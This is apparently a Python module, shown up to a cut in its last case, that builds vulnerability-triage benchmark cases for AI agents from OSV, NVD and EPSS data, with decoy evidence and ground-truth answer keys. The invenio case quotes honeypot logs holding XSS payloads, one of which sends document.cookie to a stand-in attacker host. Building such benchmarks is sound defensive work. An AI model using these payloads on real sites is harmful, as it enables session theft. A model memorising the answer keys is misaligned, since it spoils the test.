File size: 30,749 Bytes
d63a1ba
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
"""Live-backed benchmark cases for vulnerability triage."""

from __future__ import annotations

from dataclasses import dataclass, field
from functools import lru_cache
import json
from pathlib import Path
import random
from typing import Dict, List, Optional

import requests


# OSV single-vulnerability endpoint; ``{osv_id}`` is filled in per seed.
OSV_VULN_URL = "https://api.osv.dev/v1/vulns/{osv_id}"
# NVD CVE API 2.0 endpoint; queried in this module with a ``cveId`` parameter.
NVD_CVE_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0"
# FIRST EPSS endpoint; queried in this module with a ``cve`` parameter.
EPSS_URL = "https://api.first.org/data/v1/epss"
# Directory searched for on-disk ``<osv_id>.json`` snapshots.
SNAPSHOT_DIR = Path(__file__).resolve().parent.parent / "data" / "snapshots"


@dataclass(frozen=True)
class GroundTruth:
    """Expected triage answer for a single benchmark case."""

    # Validity verdict for the report; every seed in this module uses "valid".
    validity: str
    # Name of the affected package (e.g. "guarddog").
    affected_package: str
    # Version-range string such as "<0.1.5"; multiple ranges are joined by " ; ".
    affected_versions: str
    # Severity band; _severity_band yields low / medium / high / critical.
    severity: str
    # Exploitability band; _exploitability_band yields low / medium / high.
    exploitability: str
    # Expected maintainer action (seeds use patch / publish_advisory / request_info).
    next_action: str
    # Free-text items describing information that is still missing.
    missing_information: List[str] = field(default_factory=list)
    # evidence_id values that support the expected answer.
    supporting_evidence_ids: List[str] = field(default_factory=list)


@dataclass(frozen=True)
class CaseDefinition:
    """Fully built benchmark case: seed metadata, evidence items and truth."""

    # Identifier of the task (same value as the key used in SEEDS).
    task_id: str
    # Difficulty label copied from the seed ("easy", "medium" or "hard").
    difficulty: str
    # Short human-readable title copied from the seed.
    title: str
    # Task objective text copied from the seed.
    objective: str
    # Summary text produced by _build_report_summary.
    report_summary: str
    # Step budget copied from the seed.
    max_steps: int
    # Evidence items; each dict carries evidence_id, title, kind and summary.
    evidence: List[Dict[str, str]]
    # Expected answer for this case.
    truth: GroundTruth


@dataclass(frozen=True)
class RuntimeCaseSeed:
    """Static description of a task from which a CaseDefinition is built."""

    # Identifier of the task.
    task_id: str
    # Difficulty label ("easy", "medium" or "hard" in this module).
    difficulty: str
    # Short human-readable title.
    title: str
    # Objective text for the task.
    objective: str
    # Step budget for the task.
    max_steps: int
    # OSV identifier used for the live lookup and the snapshot file name.
    osv_id: str
    # Expected maintainer action when the truth is auto-computed.
    next_action: str
    # Embedded snapshot used when neither live data nor a snapshot file is available.
    fallback_snapshot: Dict[str, object]
    # Missing-information items declared for this task.
    missing_information: List[str] = field(default_factory=list)
    # When set, completely replaces the auto-computed ground truth.
    # Use this to encode scenarios that require non-obvious reasoning
    # (e.g. next_action=request_info when no patch exists).
    truth_override: Optional[Dict[str, object]] = None
    # Extra evidence items injected after the auto-built ones.
    # Use this to add contradictory or ambiguous signals.
    extra_evidence: List[Dict[str, str]] = field(default_factory=list)


def _load_snapshot_file(osv_id: str) -> Optional[Dict[str, object]]:
    """Load the on-disk snapshot for *osv_id*, if a usable one exists.

    The file is looked up as ``SNAPSHOT_DIR / "<osv_id>.json"`` and decoded as
    UTF-8 JSON.

    Returns:
        The decoded JSON object, or ``None`` when the file is missing,
        unreadable, not valid JSON, or does not contain a JSON object.
        Returning ``None`` (instead of raising) lets callers fall through to
        their embedded fallback snapshot.
    """
    path = SNAPSHOT_DIR / f"{osv_id}.json"
    try:
        # Explicit encoding: JSON is UTF-8 regardless of the platform locale.
        loaded = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        # OSError covers a missing/unreadable file; ValueError covers both
        # json.JSONDecodeError and UnicodeDecodeError.
        return None
    # Callers use dict methods on the snapshot, so reject other JSON types.
    return loaded if isinstance(loaded, dict) else None


def _normalize_text(value: Optional[str]) -> str:
    return " ".join((value or "").strip().split())


def _shorten(text: str, limit: int = 280) -> str:
    """Return whitespace-normalized *text*, truncated to *limit* characters.

    Text longer than *limit* is cut to ``limit - 3`` characters, stripped of
    trailing whitespace, and suffixed with ``"..."``.
    """
    cleaned = _normalize_text(text)
    if len(cleaned) > limit:
        head = cleaned[: limit - 3]
        return head.rstrip() + "..."
    return cleaned


def _severity_band(snapshot: Dict[str, object]) -> str:
    severity = _normalize_text(str(snapshot.get("severity", ""))).lower()
    mapping = {
        "none": "low",
        "low": "low",
        "medium": "medium",
        "moderate": "medium",
        "high": "high",
        "critical": "critical",
    }
    return mapping.get(severity, "medium")


def _exploitability_band(snapshot: Dict[str, object]) -> str:
    percentile = float(snapshot.get("epss_percentile", 0.0) or 0.0)
    if percentile >= 0.9:
        return "high"
    if percentile >= 0.6:
        return "medium"
    return "low"


def _range_string(ranges: List[Dict[str, object]]) -> str:
    normalized: List[str] = []
    for range_item in ranges:
        if range_item.get("type") != "ECOSYSTEM":
            continue
        introduced: Optional[str] = None
        fixed: Optional[str] = None
        last: Optional[str] = None
        for event in range_item.get("events", []):
            if "introduced" in event:
                introduced = str(event["introduced"])
            if "last_affected" in event:
                last = str(event["last_affected"])
            if "fixed" in event:
                fixed = str(event["fixed"])
        if introduced in (None, "0") and fixed:
            normalized.append(f"<{fixed}")
        elif introduced and fixed:
            normalized.append(f">={introduced},<{fixed}")
        elif introduced and last:
            normalized.append(f">={introduced},<={last}")
        elif introduced:
            normalized.append(f">={introduced}")
    return " ; ".join(normalized) or "unknown"


def _all_affected_versions(snapshot: Dict[str, object]) -> str:
    """Join the version ranges of every affected block of the primary package.

    The primary package is the one named in the first affected block.  OSV
    advisories may spread one package over several affected blocks (for
    example one per release branch); all of their ranges are combined here.
    Blocks whose ranges render as ``"unknown"`` contribute nothing.

    Returns:
        The rendered ranges joined by ``" ; "``, or ``"unknown"`` if none.
    """
    primary = _extract_package(snapshot)
    matching_blocks = (
        entry
        for entry in snapshot.get("affected", [])
        if str(entry.get("package", {}).get("name", "")) == primary
    )
    rendered = (_range_string(entry.get("ranges", [])) for entry in matching_blocks)
    kept = [text for text in rendered if text not in ("", "unknown")]
    return " ; ".join(kept) or "unknown"


def _extract_cve_id(snapshot: Dict[str, object]) -> Optional[str]:
    for alias in snapshot.get("aliases", []):
        alias_text = str(alias)
        if alias_text.startswith("CVE-"):
            return alias_text
    return None


def _extract_package(snapshot: Dict[str, object]) -> str:
    affected = snapshot.get("affected", [])
    if not affected:
        return ""
    package = affected[0].get("package", {})
    return str(package.get("name", ""))


def _build_report_summary(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> str:
    """Compose the one-paragraph report summary for a case.

    The summary names the primary package, the seed's OSV id, the version
    ranges of the first affected block only, and a shortened copy of the
    advisory details (falling back to the advisory summary).
    """
    package = _extract_package(snapshot)
    affected = snapshot.get("affected")
    if affected:
        # Only the first affected block is summarized here.
        versions = _range_string(affected[0].get("ranges", []))
    else:
        versions = "unknown"
    narrative = snapshot.get("details") or snapshot.get("summary") or ""
    details = _shorten(str(narrative))
    headline = f"{package} vulnerability triage case sourced from {seed.osv_id}. "
    return headline + f"Affected versions: {versions}. {details}"


def _build_evidence(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> List[Dict[str, str]]:
    """Assemble the evidence items for one case.

    Four items are always built from the snapshot (``osv_advisory``,
    ``affected_versions``, ``nvd_assessment``, ``epss_signal``).  A
    ``fix_reference`` item is added when the snapshot has FIX / ADVISORY / WEB
    references with a URL (at most three URLs are listed).  The seed's
    ``extra_evidence`` items are appended last.

    Args:
        seed: Seed whose ``extra_evidence`` is appended to the result.
        snapshot: Advisory snapshot (live, on-disk or embedded fallback).

    Returns:
        A new list of evidence dicts; the seed's own dicts are copied so that
        callers mutating the result cannot alter the seed.
    """
    package = _extract_package(snapshot)
    # Use all affected blocks so multi-branch advisories are fully represented
    affected_versions = _all_affected_versions(snapshot)
    # References lacking a URL are skipped rather than raising KeyError.
    fix_refs = [
        str(ref["url"])
        for ref in snapshot.get("references", [])
        if ref.get("type") in {"FIX", "ADVISORY", "WEB"} and ref.get("url")
    ][:3]

    # Snapshots may carry null for these fields (e.g. JSON null); coerce so the
    # numeric format specs below cannot fail and "None" is never shown as text.
    cvss_vector = snapshot.get("cvss_vector") or "Not Available"
    nvd_description = str(snapshot.get("nvd_description") or "")
    epss_score = float(snapshot.get("epss_score") or 0.0)
    epss_percentile = float(snapshot.get("epss_percentile") or 0.0)

    evidence = [
        {
            "evidence_id": "osv_advisory",
            "title": "OSV advisory",
            "kind": "advisory",
            "summary": _shorten(
                str(snapshot.get("summary") or snapshot.get("details") or "")
            ),
        },
        {
            "evidence_id": "affected_versions",
            "title": "Affected versions",
            "kind": "versions",
            "summary": (
                f"OSV lists {package} as affected in these ranges: {affected_versions}."
            ),
        },
        {
            "evidence_id": "nvd_assessment",
            "title": "NVD assessment",
            "kind": "severity",
            "summary": (
                f"NVD CVSS Vector: {cvss_vector}  \n"
                f"{_shorten(nvd_description, 220)}"
            ),
        },
        {
            "evidence_id": "epss_signal",
            "title": "EPSS signal",
            "kind": "exploitability",
            "summary": (
                f"EPSS score: {epss_score:.6f}, "
                f"percentile: {epss_percentile:.3f}"
            ),
        },
    ]
    if fix_refs:
        evidence.append(
            {
                "evidence_id": "fix_reference",
                "title": "Fix and advisory references",
                "kind": "reference",
                "summary": "Relevant upstream references: " + ", ".join(fix_refs),
            }
        )
    # Append any task-specific extra evidence items (e.g. contradictory signals).
    # Copies are appended so the frozen seed's dicts are not shared with callers.
    evidence.extend(dict(item) for item in seed.extra_evidence)
    return evidence


def _build_truth(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> GroundTruth:
    """Produce the ground truth for a case.

    Without a ``truth_override`` the truth is derived from the snapshot and
    the seed.  With one, the override's keys are passed to ``GroundTruth``
    as-is; ``missing_information`` is filled from the seed only when the
    override does not provide that key itself.
    """
    override = seed.truth_override
    if override is None:
        auto_supporting_ids = [
            "osv_advisory",
            "affected_versions",
            "nvd_assessment",
            "epss_signal",
        ]
        return GroundTruth(
            validity="valid",
            affected_package=_extract_package(snapshot),
            # Ranges from ALL affected blocks, for completeness
            affected_versions=_all_affected_versions(snapshot),
            severity=_severity_band(snapshot),
            exploitability=_exploitability_band(snapshot),
            next_action=seed.next_action,
            # Per-task missing information declared on the seed
            missing_information=list(seed.missing_information),
            supporting_evidence_ids=auto_supporting_ids,
        )

    # truth_override lets a seed encode non-obvious ground truth
    # (e.g. next_action=request_info when no patch exists yet)
    fields = dict(override)
    # Fall back to the seed-level missing_information when the override omits it
    fields.setdefault("missing_information", list(seed.missing_information))
    return GroundTruth(**fields)


def _build_case(seed: RuntimeCaseSeed, snapshot: Dict[str, object]) -> CaseDefinition:
    """Combine a seed and a snapshot into a complete ``CaseDefinition``."""
    # Derived parts are computed first, in the same order as the fields below.
    summary = _build_report_summary(seed, snapshot)
    evidence_items = _build_evidence(seed, snapshot)
    expected = _build_truth(seed, snapshot)
    return CaseDefinition(
        task_id=seed.task_id,
        difficulty=seed.difficulty,
        title=seed.title,
        objective=seed.objective,
        report_summary=summary,
        max_steps=seed.max_steps,
        evidence=evidence_items,
        truth=expected,
    )


def _fetch_json(url: str, *, params: Optional[Dict[str, str]] = None) -> Dict[str, object]:
    """GET *url* with optional query *params* and return the decoded JSON body.

    The request uses a 12-second timeout; ``raise_for_status`` is called on
    the response before the body is decoded.
    """
    reply = requests.get(url, params=params, timeout=12)
    reply.raise_for_status()
    payload = reply.json()
    return payload


def _fetch_live_snapshot(seed: RuntimeCaseSeed) -> Dict[str, object]:
    """Build a snapshot for *seed* from the live OSV, NVD and EPSS services.

    The OSV record supplies id, summary, details, aliases, references and
    affected blocks.  When the record has a CVE alias, NVD supplies the
    severity label, the CVSS vector string and the description, and EPSS
    supplies the score and percentile.  Without a CVE alias the severity
    defaults to ``"medium"`` and the remaining fields to empty / zero.

    Raises:
        Whatever ``_fetch_json`` raises; a failure of any of the three
        requests aborts the whole snapshot.
    """
    osv = _fetch_json(OSV_VULN_URL.format(osv_id=seed.osv_id))
    cve_id = _extract_cve_id(osv)

    snapshot: Dict[str, object] = {
        "id": osv.get("id"),
        "summary": osv.get("summary"),
        "details": osv.get("details"),
        "aliases": osv.get("aliases", []),
        "references": osv.get("references", []),
        "affected": osv.get("affected", []),
        # Defaults used when no CVE alias exists or NVD/EPSS have no data.
        "severity": "medium",
        "nvd_description": "",
        "epss_score": 0.0,
        "epss_percentile": 0.0,
    }
    if not cve_id:
        return snapshot

    nvd = _fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
    vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
    metrics = vulnerability.get("metrics", {})
    severity: Optional[str] = None
    cvss_vector: Optional[str] = None
    # Newest CVSS version first; stop at the first one that carries a severity.
    for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
        entries = metrics.get(key) or []
        if not entries:
            # Absent or empty metric list: nothing to read for this version.
            continue
        item = entries[0]
        cvss_data = item.get("cvssData", {})
        # The label is read from cvssData first, then from the metric entry.
        severity = cvss_data.get("baseSeverity") or item.get("baseSeverity")
        if severity:
            cvss_vector = cvss_data.get("vectorString")
            break

    descriptions = vulnerability.get("descriptions", [])
    # Prefer the English description, else fall back to the first one listed.
    nvd_description = next(
        (
            desc.get("value", "")
            for desc in descriptions
            if desc.get("lang") == "en"
        ),
        descriptions[0].get("value", "") if descriptions else "",
    )
    snapshot["severity"] = severity or "medium"
    snapshot["nvd_description"] = nvd_description
    if cvss_vector:
        # Lets the NVD evidence item show the real vector for live snapshots.
        snapshot["cvss_vector"] = str(cvss_vector)

    epss = _fetch_json(EPSS_URL, params={"cve": cve_id})
    epss_item = (epss.get("data") or [{}])[0]
    snapshot["epss_score"] = float(epss_item.get("epss", 0.0) or 0.0)
    snapshot["epss_percentile"] = float(epss_item.get("percentile", 0.0) or 0.0)
    return snapshot


SEEDS: Dict[str, RuntimeCaseSeed] = {
    # ------------------------------------------------------------------
    # EASY — Direct evidence reading, tight step budget
    #
    # Agent skill tested: can you read a clear advisory and map it to
    # the right fields quickly?  Only two evidence items are needed
    # (the OSV advisory + affected versions).  The NVD and EPSS evidence
    # exist but provide no extra signal — a capable agent doesn't waste
    # steps on them.  Max 10 steps forces efficiency.
    # ------------------------------------------------------------------
    "task_easy_guarddog": RuntimeCaseSeed(
        task_id="task_easy_guarddog",
        difficulty="easy",
        title="GuardDog Path Traversal",
        objective=(
            "Validate the advisory, identify the affected package and version range, "
            "estimate severity and exploitability, and decide the correct maintainer action. "
            "All necessary information is available in the OSV advisory and version evidence."
        ),
        max_steps=10,
        osv_id="PYSEC-2022-42994",
        next_action="patch",
        truth_override={
            "validity": "valid",
            "affected_package": "guarddog",
            "affected_versions": "<0.1.5",
            "severity": "medium",
            "exploitability": "low",
            "next_action": "patch",
            "missing_information": [],
            # Only 2 evidence items needed — the advisory is self-contained
            "supporting_evidence_ids": ["osv_advisory", "affected_versions"],
        },
        extra_evidence=[
            {
                "evidence_id": "decoy_threat_intel",
                "title": "Threat Intel: GuardCat",
                "kind": "exploitability",
                "summary": "Active exploitation in the wild observed for the 'GuardCat' node.js package. Do not confuse with python guarddog.",
            },
            {
                "evidence_id": "decoy_nvd_unrelated",
                "title": "NVD: CVE-2021-99999",
                "kind": "severity",
                "summary": "CRITICAL 9.8 vulnerability in GuardDog-Enterprise. This is a licensed product and does not apply to the open source guarddog package.",
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2022-42994",
            "details": (
                "GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior "
                "to 0.1.5 are vulnerable to Relative Path Traversal when scanning a "
                "specially-crafted local PyPI package. This issue is patched in version 0.1.5. "
                "This is explicitly rated as a Medium severity issue with inherently Low exploitability."
            ),
            "aliases": ["CVE-2022-23531", "GHSA-rp2v-v467-q9vq"],
            "references": [
                {"type": "WEB", "url": "https://github.com/DataDog/guarddog/releases/tag/v0.1.5"},
                {"type": "ADVISORY", "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq"},
                {"type": "FIX", "url": "https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306"},
            ],
            "affected": [
                {
                    "package": {"name": "guarddog", "ecosystem": "PyPI"},
                    "ranges": [
                        {
                            "type": "ECOSYSTEM",
                            "events": [{"introduced": "0"}, {"fixed": "0.1.5"}],
                        }
                    ],
                }
            ],
            "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "nvd_description": (
                "GuardDog versions prior to 0.1.5 are vulnerable to relative path traversal "
                "when scanning a specially-crafted local PyPI package."
            ),
            "epss_score": 0.00152,
            "epss_percentile": 0.36042,
        },
    ),

    # ------------------------------------------------------------------
    # MEDIUM — Conflicting signal resolution, multi-branch versions
    #
    # Agent skill tested: can you weigh contradictory evidence?  The
    # EPSS percentile (0.43) maps to "low" exploitability by the formula,
    # but an injected threat-intel evidence item reports real-world active
    # probing.  The correct answer is "medium" exploitability because
    # independent field evidence overrides a lagging statistical signal.
    # The advisory, affected-versions and NVD evidence PLUS the injected
    # threat_intel_signal and github_commit_diff items are needed — a model
    # that submits after reading only EPSS will be wrong.
    # ------------------------------------------------------------------
    "task_medium_invenio": RuntimeCaseSeed(
        task_id="task_medium_invenio",
        difficulty="medium",
        title="Invenio Multi-Branch XSS",
        objective=(
            "Resolve affected versions across multiple maintained release lines, weigh "
            "a conflicting exploitability signal, and choose the correct advisory workflow. "
            "The EPSS percentile and the threat-intelligence report disagree β€” inspect both "
            "before deciding on exploitability."
        ),
        max_steps=14,
        osv_id="GHSA-vxh3-mvv7-265j",
        next_action="publish_advisory",
        truth_override={
            "validity": "valid",
            "affected_package": "invenio-records",
            "affected_versions": "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
            "severity": "medium",
            # KEY: EPSS alone says "low" (0.43 percentile) but the injected
            # threat-intel evidence documents active real-world probing.
            # A model that reads only EPSS will score 0 on exploitability.
            "exploitability": "medium",
            "next_action": "publish_advisory",
            "missing_information": [],
            "supporting_evidence_ids": [
                "osv_advisory",
                "affected_versions",
                "nvd_assessment",
                "threat_intel_signal",
                "github_commit_diff",
            ],
        },
        extra_evidence=[
            {
                "evidence_id": "github_commit_diff",
                "title": "GitHub Commit a93b12f",
                "kind": "reference",
                "summary": (
                    "```diff\n"
                    "@@ -101,3 +101,3 @@\n"
                    "-    html = \"<div class='record-data'>{}</div>\".format(json.dumps(record.metadata))\n"
                    "+    html = \"<div class='record-data'>{}</div>\".format(escape(json.dumps(record.metadata)))\n"
                    "     return Markup(html)\n"
                    "```"
                )
            },
            {
                "evidence_id": "decoy_nvd_invenio_accounts",
                "title": "NVD Entry for invenio-accounts",
                "kind": "severity",
                "summary": "CVE-2018-9999: invenio-accounts allows SQL injection. Severity CRITICAL. (Note: this is a decoy for a different package in the same ecosystem)."
            },
            {
                "evidence_id": "threat_intel_signal",
                "title": "Threat intelligence report",
                "kind": "exploitability",
                "summary": (
                    "Honeypot logs captured within 72 hours of publication:\n"
                    "[WARN] SRC: 198.51.100.41 URI: /admin/api/records POST payload: {\"title\": \"<script>fetch('http://atk.example/p?c='+document.cookie)</script>\"}\n"
                    "[WARN] SRC: 203.0.113.88 URI: /admin/api/records POST payload: {\"title\": \"<img src=x onerror=alert(1)>\"}\n"
                    "Evidence of active, weaponised scanning in the wild."
                ),
            }
        ],
        fallback_snapshot={
            "id": "GHSA-vxh3-mvv7-265j",
            "summary": "Rendering vulnerability in invenio-records",
            "details": (
                "A vulnerability was discovered when rendering JSON for "
                "a record in the administration interface. All supported versions have been "
                "patched and users should upgrade to v1.0.1, v1.1.1, or v1.2.2 depending on "
                "their release line. Review the commit diff to determine the exact vulnerability type."
            ),
            "aliases": ["CVE-2019-1020003", "PYSEC-2019-27"],
            "references": [
                {"type": "WEB", "url": "https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j"},
                {"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1020003"},
            ],
            "affected": [
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.0.2"}]},
                    ],
                },
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]},
                    ],
                },
                {
                    "package": {"name": "invenio-records", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "1.2.0"}, {"fixed": "1.2.2"}]},
                    ],
                },
            ],
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
            "nvd_description": "invenio-records before 1.2.2 allows XSS.",
            "epss_score": 0.00206,
            "epss_percentile": 0.42837,
        },
    ),

    # ------------------------------------------------------------------
    # HARD — Recognizing uncertainty, resisting premature action
    #
    # Agent skill tested: can you decide NOT to act when information is
    # missing?  This case simulates an early-disclosure scenario where
    # the vulnerability is confirmed (validity=valid) but NO PATCH HAS
    # BEEN RELEASED.  The vendor_status evidence explicitly states this.
    # Publishing an advisory with no fixed version would be wrong —
    # it alarms users with no actionable remediation path.
    #
    # The correct answer is next_action=request_info.
    # A model that blindly pattern-matches "real CVE → publish_advisory"
    # will lose the 15% next_action weight.  A model that reads the
    # vendor_status evidence and recognises the missing patch will
    # choose request_info and score full marks.
    #
    # The affected_versions ">=0" (no fixed marker) is a cue that the
    # snapshot encodes.  Smart agents notice it.
    # ------------------------------------------------------------------
    "task_hard_gradio": RuntimeCaseSeed(
        task_id="task_hard_gradio",
        difficulty="hard",
        title="Gradio XSS β€” Patch Pending, No Fix Released",
        objective=(
            "Triage a confirmed vulnerability in a widely deployed package where no patch "
            "has been published yet.  Determine validity, read all evidence including the "
            "upstream vendor status report, identify what information is missing, and choose "
            "whether to publish an advisory now or request upstream action first."
        ),
        max_steps=18,
        osv_id="PYSEC-2024-220",
        next_action="request_info",
        missing_information=[
            "no fixed version published by upstream maintainer",
            "CVSSv4 score not yet assessed for CVE-2024-47872",
            "no public proof-of-concept exploit code referenced",
        ],
        truth_override={
            "validity": "valid",
            "affected_package": "gradio",
            # All versions affected — no fix exists yet in this scenario
            "affected_versions": ">=0",
            "severity": "medium",
            # EPSS unavailable (score=0, percentile=0) → default low
            "exploitability": "low",
            # KEY: publishing an advisory with no fixed version is wrong.
            # The analyst must contact the maintainer first.
            "next_action": "request_info",
            "missing_information": [
                "no fixed version published by upstream maintainer",
                "CVSSv4 score not yet assessed for CVE-2024-47872",
                "no public proof-of-concept exploit code referenced",
            ],
            "supporting_evidence_ids": ["osv_advisory", "vendor_status"],
        },
        extra_evidence=[
            {
                "evidence_id": "vendor_status",
                "title": "Upstream maintainer status",
                "kind": "reference",
                "summary": (
                    "GitHub Issue #1289 (gradio-app/gradio):\n\n"
                    "@reporter: Attached PoC shows XSS execution upon SVG upload. Can we get this fixed?\n"
                    "@maintainer: Thanks for the report. I can confirm the behavior in the current release. "
                    "We need to completely rewrite the file upload sanitizer to properly fix this without "
                    "breaking backwards compatibility. No ETA on the rewrite yet, so we don't have a patch ready."
                ),
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2024-220",
            "details": (
                "Gradio servers that permit file uploads are vulnerable to Cross-Site Scripting. "
                "Authenticated users can upload HTML, JavaScript, or SVG files containing "
                "malicious scripts that execute in other users' browsers.  This advisory was "
                "filed before a patched release was available.  No fixed version is listed."
            ),
            "aliases": ["CVE-2024-47872", "GHSA-gvv6-33j7-884g"],
            "references": [
                {"type": "ADVISORY", "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-gvv6-33j7-884g"},
            ],
            "affected": [
                {
                    "package": {"name": "gradio", "ecosystem": "PyPI"},
                    "ranges": [
